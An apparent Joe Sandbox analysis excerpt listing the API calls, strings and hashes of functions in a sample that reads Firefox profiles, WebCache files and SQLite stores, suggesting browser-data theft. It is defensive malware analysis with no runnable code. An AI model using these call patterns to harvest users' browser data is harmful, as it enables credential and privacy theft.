                                                                            • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                            Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                            • String ID:
                                                                            • API String ID: 2941347001-0
                                                                            • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                            • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                            • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                            • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                            Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00403C09
                                                                            • memset.MSVCRT ref: 00403C1E
                                                                              • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                              • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                            • wcscat.MSVCRT ref: 00403C47
                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                            • wcscat.MSVCRT ref: 00403C70
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memsetwcscat$Closewcscpywcslen
                                                                            • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                            • API String ID: 3249829328-1174173950
                                                                            • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                            • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                            • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                            • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                            Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040A824
                                                                            • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                            • wcscpy.MSVCRT ref: 0040A854
                                                                            • wcscat.MSVCRT ref: 0040A86A
                                                                            • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                            • String ID:
                                                                            • API String ID: 669240632-0
                                                                            • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                            • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                            • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                            • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                            Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • wcschr.MSVCRT ref: 00414458
                                                                            • _snwprintf.MSVCRT ref: 0041447D
                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                            • String ID: "%s"
                                                                            • API String ID: 1343145685-3297466227
                                                                            • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                            • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                            • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                            • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                            Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                            • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                            • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProcProcessTimes
                                                                            • String ID: GetProcessTimes$kernel32.dll
                                                                            • API String ID: 1714573020-3385500049
                                                                            • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                            • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                            • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                            • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                            Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004087D6
                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                              • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                            • memset.MSVCRT ref: 00408828
                                                                            • memset.MSVCRT ref: 00408840
                                                                            • memset.MSVCRT ref: 00408858
                                                                            • memset.MSVCRT ref: 00408870
                                                                            • memset.MSVCRT ref: 00408888
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                            • String ID:
                                                                            • API String ID: 2911713577-0
                                                                            • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                            • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                            • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                            • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                            Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                            • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                            • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcmp
                                                                            • String ID: @ $SQLite format 3
                                                                            • API String ID: 1475443563-3708268960
                                                                            • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                            • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                            • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                            • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                            Function 00414C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                            • memset.MSVCRT ref: 00414C87
                                                                            • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                            • wcscpy.MSVCRT ref: 00414CFC
                                                                              • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                            • API String ID: 2705122986-2036018995
                                                                            • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                            • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                            • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                            • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                            Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmpqsort
                                                                            • String ID: /nosort$/sort
                                                                            • API String ID: 1579243037-1578091866
                                                                            • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                            • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                            • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                            • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                            Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040E60F
                                                                            • memset.MSVCRT ref: 0040E629
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                            Strings
                                                                            • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                            • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                            • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                            • API String ID: 3354267031-2114579845
                                                                            • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                            • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                            • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                            • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                            Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                            • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                            • String ID:
                                                                            • API String ID: 3473537107-0
                                                                            • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                            • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                            • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                            • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                            Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                            • API String ID: 2221118986-1725073988
                                                                            • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                            • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                            • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                            • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                            Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                            • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@DeleteObject
                                                                            • String ID: r!A
                                                                            • API String ID: 1103273653-628097481
                                                                            • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                            • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                            • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                            • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                            Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@
                                                                            • String ID:
                                                                            • API String ID: 1033339047-0
                                                                            • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                            • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                            • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                            • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                            Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                            • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$memcmp
                                                                            • String ID: $$8
                                                                            • API String ID: 2808797137-435121686
                                                                            • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                            • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                            • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                            • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                            Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                              • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                              • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                              • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                              • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                              • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                              • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                              • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                              • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                            • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                              • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                              • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                              • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,774D2EE0), ref: 0040E3EC
                                                                            • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                            • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                              • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                              • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                              • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                            • String ID:
                                                                            • API String ID: 1979745280-0
                                                                            • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                            • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                            • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                            • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                            Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                              • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                              • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                            • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                            • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                            • free.MSVCRT ref: 00418803
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                            • String ID:
                                                                            • API String ID: 1355100292-0
                                                                            • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                            • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                            • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                            • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                            Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                            • memset.MSVCRT ref: 00403A55
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
